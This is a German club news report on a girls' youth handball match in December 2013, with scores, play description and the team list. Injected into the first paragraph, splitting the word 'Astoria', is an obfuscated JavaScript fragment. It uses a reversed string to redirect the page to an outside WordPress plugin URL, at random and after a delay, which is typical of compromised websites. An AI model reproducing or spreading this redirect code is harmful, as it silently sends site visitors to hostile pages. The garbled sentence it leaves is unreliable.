weibl. D-Jugend: Spaß und Mannschaftsleistung = Sieg

Am vergangenen Sonntag den 01.12.2013, machte sich die weibliche D Jugend der SG Neckargemünd-Mückenloch auf nach Walldorf in die Astoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toria Halle. Ein Quäntchen Nervosität war bei allen Mädels zu spüren, denn sie wussten, dass es eine herausfordernde Partie werden würde.
Neckargemünd, 01.12.13 (cko) –Das Spiel begann leider -wie die letzten drei Spiele- mal wieder mit einer Suche nach einem Schiedsrichter. Aber auch hier war das Problem schnell gelöst. Die Mädels haben sich dadurch nicht aus der Ruhe bringen lassen und übten währenddessen noch schnell ein paar Spielzüge.

Als das Spiel mit ein paar Minuten Verspätung begann, startete man gleich mit einem Treffer und zog bis zum 0:3 davon. Die Defensive der Walldorferinnen war gut, aber durch viel Bewegung ohne Ball, schafften es die Mädels aus Neckargemünd und Mückenloch immer wieder die Abwehr zu durchbrechen.

Auch in der Abwehr lohnte sich das Training. Man zählte viel besser ab als im letzten Spiel und unterstützte sich, wodurch es den Gegnern schwer fiel, ihr Spiel aufzubauen. Sobald die 2. Phase der Walldörferinnen vorüber war, war es ihnen kaum möglich gefährliche Würfe zum Tor zu bringen. Bis zur Pause gab man nicht nach und man erkämpfte sich eine Pausenführung von 6:11.

6:11

In der zweiten Halbzeit kam es nun zum Stellungsspiel. Die Abwehr spielte genauso konzentriert weiter, wie in der ersten Halbzeit. Man ackerte vorbildlich und gab den Gegnern nur wenige Chancen. Die wiederum waren leichte Beute für Sandra.

Die JSG SG Walldorf/SC Sandhausen spielten sehr offensiv, aber Ronja D. riss durch viel Bewegung am Kreis die Abwehr auseinander, wodurch große Lücken entstanden. Ihre Mitspielerinnen nutzten diese Chancen und wurden belohnt. Der Gegner war sicherlich kein Schlechter, aber durch Spaß am Spielen und guter Mannschaftsleistung wurde dieser mit 11: 17 besiegt.

Hervorragend an diesem ersten Advent war vor allem die Leistung von Sandra Huber, die 5 gehaltene Siebenmeter UND einen Sieg mit nach Hause nehmen konnte.

Es spielten:
Im Tor: Sandra Huber
Im Feld: Ronja Gölz (9),Jasmin Al-Hadjadi , Hanna Müller (2), Saskia Müller (5/1), Janina Reinwald, Keilie Golic , Ronja Dietz , Lena Kramer (1/1)